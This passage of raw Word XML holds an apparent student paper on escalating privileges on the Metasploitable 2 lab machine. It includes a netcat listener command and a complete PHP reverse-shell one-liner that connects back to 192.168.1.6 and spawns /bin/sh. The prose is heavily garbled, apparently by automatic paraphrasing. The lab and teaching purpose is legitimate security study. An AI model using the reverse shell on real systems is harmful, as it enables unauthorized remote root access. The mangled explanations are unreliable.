              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4649D7" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C8B8AA9" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F425D5C" wp14:editId="40047B79">
            <wp:extent cx="2998470" cy="356235"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="4" name="Picture 4" descr="https://img.wonderhowto.com/img/68/55/63597104817452/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68/55/63597104817452/0/hack-metasploitable-2-including-privilege-escalation.w14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470" cy="356235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="305328CC" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0150E4D1" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07019DC3" wp14:editId="640DFC48">
            <wp:extent cx="2998470" cy="403860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="https://img.wonderhowto.com/img/08/21/63597104940736/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08/21/63597104940736/0/hack-metasploitable-2-including-privilege-escalation.w145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8470" cy="403860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766DD13" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766999E3" w14:textId="68ACDD30" w:rsidR="009D67AD" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>Presently we are going to run the basic endeavor order to abuse (misuse) the objective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE67D5" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4188A8" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07944A13" wp14:editId="5EEA6E4D">
            <wp:extent cx="2998470" cy="1294765"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="6" name="Picture 6" descr="https://img.wonderhowto.com/img/18/03/63597105282879/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wonderhowto.com/img/18/03/63597105282879/0/hack-metasploitable-2-including-privilege-escalation.w145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8470" cy="1294765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09248427" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C8B5E9" w14:textId="26285551" w:rsidR="009D67AD" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>The objective is our own or nearly our own?! We should see who am I (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>)!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745DDB7D" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F7978A" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6296710A" wp14:editId="407B6A25">
            <wp:extent cx="2998470" cy="510540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="7" name="Picture 7" descr="https://img.wonderhowto.com/img/81/34/63597105380545/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wonderhowto.com/img/81/34/63597105380545/0/hack-metasploitable-2-including-privilege-escalation.w145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8470" cy="510540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7D788D" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035A17C3" w14:textId="59AEFB4C" w:rsidR="009D67AD" w:rsidRDefault="00C83A1A" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve">After every one of these directions I am a basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>deamon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>! I need the root benefit to such an extent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E56C1" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="32"/>
        <w:ind w:left="-15" w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D67AD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Privilege Escalation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>½</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C235B36" w14:textId="201218D6" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:left="-15" w:right="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Presently press </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ctrl+C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to end the present association with the objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB83D8" w14:textId="336F094D" w:rsidR="009D67AD" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:left="-15" w:right="40"/>
      </w:pPr>
      <w:r>
        <w:t>Presently misuse the objective and send the activity to the foundation (abuse - j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F1D46" w14:textId="74170A5A" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It isn't heading off to the foundation. It is hanging tight for an information. As of now we had the capacity to run only one direction as root. A solitary line is isolating you from root benefits! run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> direction and we will see yet we can't run this if this is the first run through </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F7087" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now we need to keep running as root. A turn around shell to our PC. In this way, how about we begin the server! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFF5A76" w14:textId="32F514E5" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D67AD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Run a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D67AD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D67AD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDB1A9" w14:textId="0562144A" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve">Begin another terminal window and run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve"> 5555. Ensure that you are not running any administration at 5555 port. On the off chance that you do simply pick your own port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>number!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B056F" w14:textId="10841F9E" w:rsidR="009D67AD" w:rsidRDefault="00C83A1A" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D67AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="328518F3" wp14:editId="371AF094">
            <wp:extent cx="2886075" cy="580390"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="10" name="Picture 10" descr="https://img.wonderhowto.com/img/86/50/63597106287783/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wonderhowto.com/img/86/50/63597106287783/0/hack-metasploitable-2-including-privilege-escalation.w14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580390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C7086" w14:textId="292774BC" w:rsidR="00C83A1A" w:rsidRPr="00C83A1A" w:rsidRDefault="009D67AD" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D67AD">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Privilege Escalation 2/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08148516" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Presently we are back to the next terminal window, Metasploit. Many individuals would run a switch shell utilizing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. However, suppose that you have no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> accessible at the server, what are you going to do? Indeed, even the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is some sort of server. Open your program at the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP and you will see! You will see that you have phpMyAdmin! In this way, we will make a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>turn around</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell utilizing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>php.Then</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> go to the Metasploit terminal and run the order: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA98D2B" w14:textId="69B60CC3" w:rsidR="00D224FF" w:rsidRPr="00C83A1A" w:rsidRDefault="00D224FF" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>php-r'$sock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>fsockopen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>"192.168.1.6",5555);exec("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029951F6" w14:textId="77777777" w:rsidR="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F8C307D" wp14:editId="602CF344">
            <wp:extent cx="2998470" cy="715617"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="11" name="Picture 11" descr="https://img.wonderhowto.com/img/68/70/63597106937259/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wonderhowto.com/img/68/70/63597106937259/0/hack-metasploitable-2-including-privilege-escalation.w145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6080" cy="726980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7961A56B" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve">After this, go the other terminal. Indeed, the one with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve"> which is pausing! Something pleasant occurred over yonder... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CFE139" w14:textId="5142591E" w:rsidR="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="377D58F6" wp14:editId="5ECAA65D">
            <wp:extent cx="2998470" cy="550545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="12" name="Picture 12" descr="https://img.wonderhowto.com/img/00/57/63597107093823/0/hack-metasploitable-2-including-privilege-escala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wonderhowto.com/img/00/57/63597107093823/0/hack-metasploitable-2-including-privilege-escalation.w145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8470" cy="550545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FFF03E" w14:textId="77777777" w:rsidR="00D224FF" w:rsidRPr="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:right="40" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00D224FF">
        <w:t xml:space="preserve"> symbol (#)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> depicts that </w:t>
      </w:r>
      <w:r w:rsidRPr="00D224FF">
        <w:t>You are logged in as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB05EA0" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988" w:rsidP="009D67AD">
      <w:pPr>
        <w:spacing w:after="287"/>
        <w:ind w:left="-15" w:right="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IV.C</w:t>
      </w:r>
      <w:r>
        <w:t>ONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB095A" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRPr="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="11" w:firstLine="325"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Benefit heightening is the demonstration of misusing a bug, structure defect or setup oversight in a working framework or programming application to increase raised access to assets that are typically shielded from an application or client. The outcome is that an application with a larger number of benefits than planned by the application engineer or framework head can perform unapproved activities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63929D08" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRPr="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="11"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316E9155" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="11" w:firstLine="325"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Amid an infiltration test, once in a while will the analyzer gain admittance to a framework with the overseer benefits in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>thefirst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> endeavor. You are quite often required to utilize benefit heightening procedures to accomplish the infiltration test objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B578D9" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="11"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65085510" w14:textId="1B4F8BDE" w:rsidR="00AF22DD" w:rsidRDefault="00753988" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>EFERENCES</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="4742" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="312"/>
        <w:gridCol w:w="4430"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF22DD" w14:paraId="4D3F0585" w14:textId="77777777" w:rsidTr="003775F4">
        <w:trPr>
          <w:trHeight w:val="556"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="312" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BB44512" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[1].</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1DCA797D" w14:textId="77777777" w:rsidR="00D224FF" w:rsidRPr="00D224FF" w:rsidRDefault="00D224FF" w:rsidP="00D224FF">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:right="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nicolas </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D224FF">
              <w:rPr>
                <w:sz w:val="18"/>
